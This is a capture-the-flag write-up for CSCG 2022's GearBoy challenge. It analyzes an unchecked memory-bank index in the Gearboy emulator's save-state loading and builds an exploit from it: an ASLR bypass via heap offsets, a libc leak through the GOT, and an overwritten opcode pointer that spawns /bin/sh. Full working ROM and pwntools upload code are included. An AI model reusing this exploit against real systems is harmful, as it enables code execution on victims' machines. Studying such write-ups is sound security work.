CSCG 2022 - GearBoy

Last modification on 2023-05-31

Challenge

Straight forward task: Exploit the Gearboy emulator.

Overview

The task is to read the contents of the flag file by manipulating a gearboy ROM and state file that will be run on the target server using a modified, headless version of Gearboy, a gameboy emulator.

Analysis

My immediate suspicions were with missing checks for the state file and not the ROM, because the state can be saved & loaded at any point in time, while the ROM only needs to be checked upon initial load. This means that more checks need to be performed on the state file that could be broken or forgotten entirely.

By inspecting the source code for GearboyCore::LoadState we find the functionality for the emulator split into many different classes and a LoadState for each, e.g. Processor::LoadState and Memory::LoadState.

Memory::LoadState loads (among other things) the various memory bank buffers as well as values that control which banks are selected. Since the address space of the GameBoy was limited (16-bit), parts of memory had to be swapped out to facilitate access to more space. Hence the concept of memory bank switching. Often times an index is used to indicate which memory bank is in use, as is the case with WRAM1:

u8* Memory::GetWRAM1()
{
    return m_bCGB ? m_pWRAMBanks + (0x1000 * m_iCurrentWRAMBank) : m_pMap + 0xD000;
}

As long as m_bCGB (a flag for GameBoy color mode) is set, the backing buffer of WRAM1 will be chosen from a bank in m_pWRAMBanks. The value of m_bCGB is controlled by special purpose bytes in the ROM which we control.

Since m_iCurrentWRAMBank is loaded as part of the state and its value is not properly sanitized, modifying this value in the state file allows us to essentially mmap an arbitrary piece of memory into the address space of our emulated game. When the running ROM writes and reads to 0xD000-0xE000, it will instead access the address we control.

But where to write when ASLR is enabled?

To get around ASLR we need to find objects on the heap with consistent offsets to the WRAM bank buffer m_pWRAMBanks. We can do this by running gdbserver in the docker container and observing the surrounding memory and pointers of objects allocated closely before or after. The fact that each session is a freshly spawned docker container helps with consistency.

Doing this we find a heap configuration which is consistent on every first run in the docker container: the address of the Processor object is at an offset of -0x126a0 from m_pWRAMBanks and the Memory object is at an offset of -0xd0 from the Processor object. By setting the m_iCurrentWRAMBank value to -0x13 in the state file we will be able to access the Processor object at 0x13000-0x126a0+0xD000=0xD960 and the Memory object at 0x13000-0x125d0+0xD000=0xD890.

For every instruction, the processor resolves the function for handling an opcode by looking it up in a table using the opcode as an index. This opcodeTable is a member of the Processor object and as such stored on the heap. By reading one of these function pointers and subtracting its offset in the binary we can recover the base address at which the gearboy emulator is loaded.

Now that we know the base address and as a result the address of the GOT, regularly the next natural step is to leak libc by reading the GOT, calculate the address of system and overwrite a function pointer to call system. The only problem is, we are still just a ROM in an emulator and only have access to the memory mapped into 0xD000-0xE000.

We need to look for another access primitive.

This time, however, we are not limited to our state and rom file contents. We can manipulate the Memory and Processor objects directly!

Looking through the source code again we find a good candidate:

u8* Memory::GetVRAM()
{
    if (m_bCGB)
        return (m_iCurrentLCDRAMBank == 1) ? m_pLCDRAMBank1 : m_pMap + 0x8000;
    else
        return m_pMap + 0x8000;
}

We have already set m_bCGB and m_iCurrentLCDRAMBank is loaded from the state file. As such, we can make access to 0x8000-0x9000 backed by the m_pLCDRAMBank1 buffer, whose pointer we control.

We set m_pLCDRAMBank1 in the Memory object to point to the target got address of free which is calculated using the base address. We can then read the free address from 0x8000, leak the libc base and calculate the system address.

To finally call system, we overwrite a function pointer in Processor::opcodeTable and call the corresponding opcode. We ensure the first argument to system points to the string /bin/sh by writing it to the address of the Processor object, as this is the address in rdi when system is called. Since opcodeTable is the first member in Processor we need to choose an opcode to call which does not conflict with the space used for the string and also is not called before the value can be fully written (as is the case with the load instructions). The stop instruction (enum value 0x10) is a good fit here.

Exploit

The ROM code was compiled using GBDK.

rom.c

#include "stdint.h"
#include "string.h"

void
main(void)
{
    volatile static uint8_t *processor_gb;
    volatile static uint8_t *memory_gb;
    volatile static uint8_t *free_got_gb;
    volatile static uint64_t op0x00;
    volatile static uint64_t base;
    volatile static uint64_t libc;
    volatile static uint64_t free_got;
    volatile static uint64_t target;

    /* WRAM BANK = -0x13 */
    processor_gb = (void*) 0xD960;
    memory_gb = processor_gb - 0xd0;

    /* get base from op0x00 */
    op0x00 = *(uint64_t*)processor_gb;
    base = op0x00 - 0x1d420;
    free_got = base + 0x4ad78;

    /* change lcdrambank pointer to access got */
    *(uint64_t*)(memory_gb+0x90) = free_got;
    free_got_gb = (void*) 0x8000;

    libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;

    target = libc + 0x52290;
    strcpy((char*)processor_gb, "/bin/sh");
    *(uint64_t*)(processor_gb+0x10*0x10) = target;

    __asm \
        stop \
    __endasm;

    while (1);
}

upload.py

from base64 import b64encode
from sys import argv,exit
from pwn import *

rom = list(open("main.gb", "rb").read())
state = list(open("main.state", "rb").read())

# set m_iCurrentWRAMBank
for i,v in enumerate(struct.pack("<i", -0x13)):
    state[0x10000+i] = v

# set m_iCurrentLCDRAMBank
for i,v in enumerate(struct.pack("<i", 1)):
    state[0x10004+i] = v

io = process(argv[1:])

io.sendline(b64encode(bytes(rom)))
io.sendline(b64encode(bytes(state)))

io.interactive()